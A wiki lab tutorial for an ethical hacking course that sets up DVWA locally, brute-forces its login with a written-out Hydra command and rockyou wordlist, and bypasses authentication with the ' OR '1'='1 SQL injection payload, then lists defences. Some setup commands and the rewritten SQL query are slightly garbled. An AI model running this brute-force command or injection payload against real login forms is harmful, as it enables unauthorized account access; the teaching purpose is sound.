Hands-on: Password Cracking dan Authentication Bypass (en)

From OnnoWiki
Jump to navigation Jump to search

Here is a complete explanation with examples using KALI Linux 2024.3 to attack DVWA (Damn Vulnerable Web Application) with a focus on Password Cracking and Authentication Bypass for ethical hacking course purposes.

Setup DVWA on Ubuntu Server

  • Before starting the exploitation, make sure DVWA is installed and running on Ubuntu Server. Here are the steps for setup:
sudo apt update
sudo apt install apache2 mysql-server php php-mysqli php-gd libapache2-mod-php
git clone https://github.com/digininja/DVWA.git /var/www/html/dvwa
cd /var/www/html/dvwa sudo
cp config/config.inc.php.dist config/config.inc.php
sudo service apache 2 start
sudo service mysql start
  • After that, create a database for DVWA:
mysql -u root -p CREATE DATABASE dvwa;
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost' IDENTIFIED BY 'password';
FLUSH PRIVILEGES;
EXIT;
  • Finally, open a browser and access DVWA via `http://localhost/dvwa`, then login with the username `admin` and password `password`. Make sure the DVWA security level is set to Low in the DVWA Security menu.

Password Cracking (Brute Force)

To crack the password on DVWA, we will use the brute force technique with the help of Hydra, which is a tool in Kali Linux.

Step 1: Identify the Login Form

  • Open the DVWA login page in a browser and look at the relevant HTML elements. For example, the login form might have the following parameters:
    • username: input username
    • password: input password
    • Login: button to submit a request

Step 2: Running Hydra for Brute Force

  • In this example, we will use a wordlist to try to guess the password. Hydra supports brute force attacks by exploiting various methods such as POST login forms.
  • Here is an example of a Hydra command for brute force:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"
  • Where
    • `-l admin`: tries the username `admin`.
    • `-P /usr/share/wordlists/rockyou.txt`: wordlist file to try various passwords.
    • `http-post-form`: format for sending POST forms.
    • `/dvwa/login.php`: path to the login form.
    • `username=^USER^&password=^PASS^&Login=Login`: POST parameters in the login form.
    • `Login failed`: string that appears when login fails.
  • If the password is found, Hydra will display the output with the correct password.

Example Output:

[80][http-post-form] host: 127.0.0.1 login: admin password: 123456

Authentication Bypass (SQL Injection)

SQL Injection is a technique that exploits weaknesses in SQL queries used by web applications. In the case of authentication bypass, we can inject SQL queries into the login form to access an account without knowing the password.

Step 1: Identifying SQL Injection in the Login Form

  • Go to the DVWA login page and enter the following payload in the username and password fields:
Username: `' OR '1'='1`
Password: `' OR '1'='1`
  • This payload exploits the weakness in the SQL query in the backend by adding the condition `'1'='1`, which is always true, so that authentication bypass occurs.

Step 2: Exploitation Process

  • After entering the payload above, click Login. If the application is vulnerable to SQL Injection, you will successfully log in as an administrator or another user without entering the correct password.

SQL Injection Explanation

  • In the backend, the SQL query that is usually used is:
SELECT * FROM users WHERE username = 'input_username' AND password = 'input_password';
  • With the payload `' OR '1'='1`, the query becomes:
SELECT * FROM users WHERE username =  OR '1'='1' AND password =  OR '1'='1';
  • Since `'1'='1'` is always true, this query will return all records from the `users` table, and the application assumes the login is successful.

Preventive Steps

To prevent password cracking and SQL injection attacks, the steps that can be taken are:

  • Using strong passwords and implementing rate-limiting on logins to prevent brute force.
  • Using prepared statements (parameterized queries) to avoid SQL Injection.
  • Filtering user input and validating it.

By using these techniques in ethical hacking class, we can learn how attackers can exploit security holes and how to protect the system from such attacks.

Interesting Links